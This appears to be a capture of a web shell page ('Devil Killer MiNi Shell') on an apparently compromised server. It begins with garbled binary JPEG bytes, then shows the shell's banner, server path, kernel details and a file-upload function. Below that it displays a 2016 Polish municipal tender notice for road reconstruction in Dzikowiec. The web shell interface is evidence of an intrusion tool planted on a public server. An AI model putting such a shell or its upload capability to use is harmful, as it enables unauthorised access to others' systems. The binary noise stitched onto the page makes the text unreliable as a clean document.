JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160708/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160708/127527-N-2016.html

<p class="kh_header"><b>Dzikowiec: Przebudowa  dróg gminnych w Dzikowcu i Wilczej Woli 
z podziałem na następujące zadania:
 Zadanie nr 1. Przebudowa drogi gminnej w Dzikowcu ul. Szkolna
 Zadanie nr 2. Przebudowa drogi gminnej Spie - Gwoździec w Wilczej Woli
 Zadanie nr 3. Przebudowa drogi gminnej Maziarnia - Szwedy w Wilczej Woli
 Zadanie nr 4. Przebudowa drogi gminnej Spie - Dule w Wilczej Woli</b><br>
<b>Numer ogłoszenia: 127527 - 2016; data zamieszczenia: 08.07.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Dzikowiec , ul. Dworska 62, 36-122 Dzikowiec, woj. brak, tel. 0-17 7442109, faks 0-17 2274508.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa  dróg gminnych w Dzikowcu i Wilczej Woli 
z podziałem na następujące zadania:
 Zadanie nr 1. Przebudowa drogi gminnej w Dzikowcu ul. Szkolna
 Zadanie nr 2. Przebudowa drogi gminnej Spie - Gwoździec w Wilczej Woli
 Zadanie nr 3. Przebudowa drogi gminnej Maziarnia - Szwedy w Wilczej Woli
 Zadanie nr 4. Przebudowa drogi gminnej Spie - Dule w Wilczej Woli.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 3.1. Przedmiotem zamówienia   są roboty budowlane polegające na  przebudowie dróg gminnych 
       w Dzikowcu i  Wilczej Woli  z podziałem na następujące zadania:
          Zadanie nr 1. Przebudowa drogi gminnej w Dzikowcu ul. Szkolna
          Zadanie nr 2. Przebudowa drogi gminnej Spie - Gwoździec w Wilczej Woli
          Zadanie nr 3. Przebudowa drogi gminnej Maziarnia - Szwedy w Wilczej Woli
          Zadanie nr 4. Przebudowa drogi gminnej Spie - Dule w Wilczej Woli
 3.2. Zakres  robót:
         1. W zakresie zadania nr 1 Przebudowa drogi gminnej w Dzikowcu ul. Szkolna 
            na długości 911 m
           a) roboty przygotowawcze 
                - odtworzenie trasy i punktów wysokościowych
                -  wyrównanie podłoża istniejącej nawierzchni bitumicznej przez wykonanie frezowania 
                    na zimno, śr. gr. w-wy 3 cm
             b) roboty ziemne
                 - wykonanie wykopów mechanicznych z transportem urobku na odkład
             c) odwodnienie korpusu drogowego
                 -wykonanie studni rewizyjnych z kręgów żelbetonowych o średnicy 1 m
                 - wykonanie kanału o średnicy 30 cm
                 - wykonanie przykanalików  o średnicy 20 cm
                 - wykonanie studzienek ściekowych O 500 mm z osadnikiem
             d) podbudowa
                 - profilowanie i zagęszczenie podłoża
                 - wykonanie podbudowy z kruszywa naturalnego 
                 - wykonanie podbudowy z kruszywa łamanego
              e)  nawierzchnie
                 - nawierzchnia z betonu asfaltowego warstwa wiążąca 5 cm
                 - nawierzchnia z betonu asfaltowego warstwa ścieralna 5 cm
               f) elementy ulic
                 - krawężniki betonowe
                 - chodniki z brukowej  kostki betonowej
                 - obrzeża betonowe
               g) roboty wykończeniowe
                 - humusowanie z obsianiem skarp
                 - uzupełnienie poboczy kruszywem łamanym 
 2. W zakresie zadania nr 2 Przebudowa drogi gminnej Spie - Gwoździec w Wilczej Woli
       na długości 2400 m
               a) podbudowa
                 - wykonanie podbudowy z kruszywa łamanego
              b)  nawierzchnie
                 - nawierzchnia z betonu asfaltowego warstwa wiążąca 4 cm
                 - nawierzchnia z betonu asfaltowego warstwa ścieralna 4 cm
               c) roboty wykończeniowe
                 - uzupełnienie poboczy kruszywem łamanym
3. W zakresie zadania nr 3 Przebudowa drogi gminnej Maziarnia - Szwedy w Wilczej Woli
        na długości 1500 m 
             a)  nawierzchnie
                 - nawierzchnia z betonu asfaltowego warstwa wiążąca 4 cm
                 - nawierzchnia z betonu asfaltowego warstwa ścieralna 4 cm
             b) roboty wykończeniowe
                 - uzupełnienie poboczy kruszywem łamanym
                 - likwidacja przełomów w poprzek drogi
  4. W zakresie zadania nr 4 Przebudowa drogi gminnej Spie - Dule w Wilczej Woli
        na długości 891 m 
               a) podbudowy
                 - wykonanie podbudowy z kruszywa łamanego
             b)  nawierzchnie
                 - nawierzchnia z betonu asfaltowego warstwa wiążąca 4 cm
                 - nawierzchnia z betonu asfaltowego warstwa ścieralna 4 cm
             c) roboty wykończeniowe
                 - uzupełnienie poboczy kruszywem łamanym.   
3.3. Szczegółowy zakres robót zawierają materiały do  zgłoszenia robót budowlanych , przedmiary
       robót i Specyfikacja Techniczna Wykonania i Odbioru Robót z zastrzeżeniem, że      przedmiary        robót mają  charakter pomocnicy   w przygotowaniu  oferty Wykonawcy. 
3.4. Wykonawca zobowiązany jest do utrzymania w czystości dróg publicznych, po których będzie        odbywał się ruch pojazdów budowy i transportujących materiały. W przypadku ewentualnych         roszczeń odszkodowawczych administratorów i zarządców za zniszczenie dróg i ulic przez
        transport budowy Wykonawca jest zobowiązany do ich naprawy na własny koszt, który nie     będzie podlegał odrębnej zapłacie i jest wliczony w cenę ofertową. 
3.6. Równoważność materiałów i urządzeń.
Jeżeli opis przedmiotu zamówienia lub  załączniki do SIWZ w tym dokumentacja projektowa, przedmiary robót oraz w kosztorysie ofertowym, zostało wskazane pochodzenie ( marka, znak towarowy, producent, dostawca ) materiałów lub normy, aprobaty , specyfikacje i systemy,          o których mowa w art. 30 ust. 1 -3 ustawy Pzp,   Zamawiający dopuszcza oferowanie materia-łów lub   rozwiązań  równoważnych pod warunkiem, że zagwarantują one realizacją robót oraz     zapewnią uzyskanie parametrów technicznych nie gorszych od załażonych w/w doku-mentach  . 
Materiały lub urządzenia pochodzące od konkretnych producentów określają minimalne pa-rametry jakościowe i cechy użytkowe, jakim muszą odpowiadać materiały lub urządzenia ofe-rowane przez wykonawcę, aby zostały spełnione wymagania stawiane przez zamawiającego.
Na Wykonawcy spoczywa obowiązek wykazania, iż oferowane  roboty budowlane spełniają wymagania Zamawiającego. 
3.7. Zaleca się, aby Wykonawcy dokonali wizji lokalnej na terenie realizacji inwestycji w celu       dokonania oceny dokumentów i informacji przekazywanych w ramach przedmiotowego        postępowania przez zamawiającego..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.30.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.10.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 8.1. Zamawiający żąda wniesienia wadium w wysokości 13.000,00 zł (słownie: trzynaście tysiące  00/100 zł) .        
8.2. Wadium musi być wniesione na cały okres związania z ofertą, przed upływem terminu   składania ofert w jednej lub kilku następujących formach: 
1) pieniądzu,  2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-  kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym; 3) gwarancjach bankowych; 4) gwarancjach ubezpieczeniowych; 
 5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości ( t.j.                z 2013 r., poz. 359) .
8.3. Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego w BS Głogów Młp. O/Dzikowiec nr  27915910102003300000390006.Wadium wniesione w pieniądzu będzie przechowywane na rachunku bankowym Zamawiającego. Za termin wniesienia wadium wniesionego w pieniądzu uważa się datę uznania środków na koncie Zamawiającego.
         W przypadku wniesienia wadium w pieniądzu, wykonawca winien załączyć do oferty    oryginał lub kopię potwierdzenia wykonania przelewu wadium poświadczoną za zgodność z oryginałem przez Wykonawcę.    
        Dla pozostałych form wniesienia wadium wymagane jest złożenie wraz z ofertą dokumentu  w oryginale, a dodatkowo do oferty należy dołączyć (spiąć z ofertą) kopię składanego    dokumentu poświadczoną za zgodność z oryginałem przez Wykonawcę. Zamawiający   zwracając wadium  w     trybie art. 46 Pzp, zwróci Wykonawcy oryginał dokumentu wadium,     wobec czego zaleca się nie spinać w sposób trwały oryginału dokumentu wadium z ofertą.
8.4. Z treści gwarancji (poręczenia) musi jednoznacznie wynikać, jaki jest sposób reprezentacji  Gwaranta. Gwarancja musi być podpisana przez upoważnionego (upełnomocnionego)    przedstawiciela Gwaranta. Podpis winien być sporządzony w sposób umożliwiający jego   identyfikację np. złożony wraz z imienną pieczątką lub czytelny (z podaniem imienia   i nazwiska).
8.4. Dokument w formie poręczenia winien zawierać stwierdzenie, że na każde pisemne żądanie   zamawiającego wzywające do zapłaty wadium, zgodnie z warunkami przetargu następuje   jego bezwarunkowa wypłata w pełnej wysokości bez jakichkolwiek zastrzeżeń.
8.5. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana:
a) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach 
    określonych  w ofercie,
  b) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
  c) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.
8.6. Przedłużenie terminu związania ofertą jest dopuszczalne tylko z jednoczesnym przedłużeniem okresu ważności wadium albo, jeżeli nie jest to możliwe, z wniesieniem nowego wadium na przedłużony okres związania ofertą. Jeżeli przedłużenie terminu związania ofertą dokonywane jest po wyborze oferty najkorzystniejszej, obowiązek wniesienia nowego wadium lub jego przedłużenia dotyczy jedynie wykonawcy, którego oferta została wybrana jako najkorzystniej-sza.
8.7.Wykonawca, który nie wniesie wadium w sposób określony w SIWZ zostanie wykluczony   z postępowania, a jego oferta zostanie uznana za odrzuconą.
8.8. Zamawiający zwraca wadium wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta
  została wybrana jako najkorzystniejsza, z zastrzeżeniem ust. 4a. 
8.9.Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, zamawiający zwraca  wadium  niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego.
8.10. Zamawiający zwraca niezwłocznie wadium, na wniosek wykonawcy, który wycofał ofertę  przed     upływem terminu składania ofert.
8.11.Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na   wezwanie, o którym mowa w art. 26 ust. 3 Pzp, z przyczyn leżących po  jego stronie, nie złożył  dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 Pzp, pełnomocnictw, listy podmiotów  należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5 Pzp, lub informacji o tym, że nie należy do grupy kapitałowej, lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3 Pzp, co powodowało brak możliwości wybrania oferty złożonej przez wykonawcę jako najkorzystniejszej.
8.12.Zamawiający żąda ponownego wniesienia wadium przez wykonawcę, któremu zwrócono wadium na podstawie art. 46 ust. 1 Pzp, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez zamawiającego.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego sposobu oceny spełniania tego warunku. Zamawiający  uzna warunek za spełniony poprzez złożenie oświadczenia na podstawie  art. 22 ust. 1 ustawy   Pzp ( zał. nr 2 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać się wiedzą i doświadczeniem w wykonaniu  robót budowlanych  wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli    okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jedną robotą   budowlaną  polegającą na  budowie ,  przebudowie lub remoncie dróg na kwotę nie mniejszą            niż 800.000,00 zł brutto  i udokumentuje, że  roboty te zostały wykonane w sposób należyty            oraz wykonane zgodnie z zasadami sztuki  budowlanej i prawidłowo ukończone.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego sposobu oceny spełniania tego warunku. Zamawiający       uzna warunek za spełniony poprzez złożenie oświadczenia na podstawie  art. 22 ust. 1 ustawy Pzp ( zał. nr 2 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna  warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje  odpowiednio wykwalifikowanym personelem bezpośrednio zatrudnionym do  wykonania zamówienia lub przedstawi pisemne zobowiązanie innych podmiotów o udostępnieniu osób  zdolnych do wykonania zamówienia, tj.:
       a) min. 1 osoba -  kierownik budowy posiadająca uprawnienia budowlane do kierowania    robotami w specjalności inżynieryjnej  drogowej bez ograniczeń wydane zgodnie z ustawą   z dnia  07 lipca 1994 r. Prawo budowlane  (tekst jedn. Dz. U. z 2016 r. poz. 290 ) oraz          Rozporządzeniem Ministra Infrastruktury i Rozwoju z dnia 11 września 2014 r. w sprawie          samodzielnych funkcji technicznych  w budownictwie (Dz. U. z 2014 r., poz. 1278), albo          odpowiadające im ważne uprawnienia budowlane, które zostały wydane na  podstawie  wcześniej obowiązujących przepisów. 
     b) osoba ta musi posiadać całkowite doświadczenie co najmniej 3 - letnie na stanowisku       Kierownika budowy. Ilość lat doświadczenia należy liczyć od daty wystawienia uprawnień. 
         Zamawiający, określając wymogi dla każdej osoby w zakresie posiadanych uprawnień          budowlanych, dopuszcza odpowiadające im uprawnienia budowlane wydane obywatelom         państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej,          z zastrzeżeniem art. 12 a oraz innych przepisów ustawy Prawo budowlane ( tekst jedn. Dz.          U. z 2016 r., poz. 290) oraz ustawy o zasadach uznawania kwalifikacji zawodowych 
   nabytych w państwach członkowskich Unii Europejskiej (Dz. U z 2016 r., poz. 65), które          pozwalać będą na pełnienie w/w funkcji w zakresie objętym umową.         Ilekroć w opisie warunków udziału w postępowaniu jest mowa o uprawnieniach, to w       przypadku osób będących obywatelami krajów członkowskich Unii Europejskiej oznacza to   decyzję w sprawie uznania wymaganych kwalifikacji do wykonywania w Rzeczpospolitej 
        Polskiej samodzielnych funkcji technicznych w budownictwie w zakresie przedmiotu   niniejszego zamówienia - zgodnie z właściwymi przepisami, w szczególności z ustawą      o zasadach uznania kwalifikacji zawodowych nabytych w krajach członkowskich Unii              Europejskiej (Dz. U z 2016 r., poz. 65) oraz ustawą z dnia 15 grudnia 2000 r. o              samorządach  zawodowych architektów oraz inżynierów budownictwa  ( tekst jedn. Dz. U             z 2014 r., poz.1946).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego sposobu oceny spełniania tego warunku.
Zamawiający uzna warunek za spełniony poprzez złożenie oświadczenia na podstawie
art. 22 ust. 1 ustawy Pzp ( zał. nr 2 do SIWZ).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>5.3. Z postępowania o udzielenie zamówienia publicznego wyklucza się wykonawców o których   mowa w art. 24 Pzp. 
5.4. Zamawiający wykluczy z postępowania o udzielenie zamówienia  wykonawcę, który w okresie 3 lat przed wszczęciem postępowania, w sposób zawiniony  poważnie naruszył obowiązki  zawodowe, w szczególności, gdy wykonawca w wyniku  zamierzonego działania lub rażącego niedbalstwa nie wykonał lub nienależycie wykonał  zamówienie, co zamawiający jest w stanie  wykazać za pomocą dowolnych środków dowodowych. Zamawiający nie wyklucza  z postępowania o udzielenie zamówienia wykonawcy, który udowodni, że podjął konkretne  środki techniczne, organizacyjne i kadrowe, które mają zapobiec zawinionemu i poważnemu  naruszaniu obowiązków zawodowych  w przyszłości oraz naprawił szkody powstałe w wyniku naruszenia obowiązków zawodowych lub zobowiązał się do ich naprawienia.
5.5 Wykonawca na żądanie zamawiającego i w zakresie przez niego wskazanym jest zobowiązany wykazać odpowiednio, nie później niż na dzień składania ofert, spełnianie warunków, o których mowa w art. 22 ust. 1 Pzp, i brak podstaw do wykluczenia z powodu niespełniania warunków, o których mowa w art. 24 ust. 1,ust. 2, ust. 2a Pzp.
5.6. Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach   zdolnych do wykonania zamówienia, zdolnościach finansowych lub ekonomicznych innych  podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca  w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował tymi
zasobami w trakcie  realizacji zamówienia, w szczególności przedstawiając w tym celu  pisemne zobowiązanie tych  podmiotów do oddania mu do dyspozycji niezbędnych zasobów na   potrzeby wykonania zamówienia. Pisemne zobowiązanie powinno zawierać, co najmniej informacje zawarte w § 1 ust. 6 pkt 2) Rozporządzenia Prezesa Rady Ministrów z dnia 19 lutego 2013 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz. U. z 2013 r. poz. 231).
Zamawiający wskazuje, że podmiot, który zobowiązał się do udostępnienia zasobów zgodnie z powyższymi zapisami, odpowiada solidarnie z wykonawcą za szkodę zamawiającego   powstałą wskutek nieudostępnienia tych zasobów, chyba że za nieudostępnienie zasobów nie ponosi winy.
5.7. Zamawiający wezwie wykonawców, 
a)którzy w określonym terminie nie złożyli wymaganych przez zamawiającego oświadczeń  lub dokumentów, o których mowa w art. 25 ust. 1 Pzp, lub 
b)którzy nie złożyli pełnomocnictw, albo 
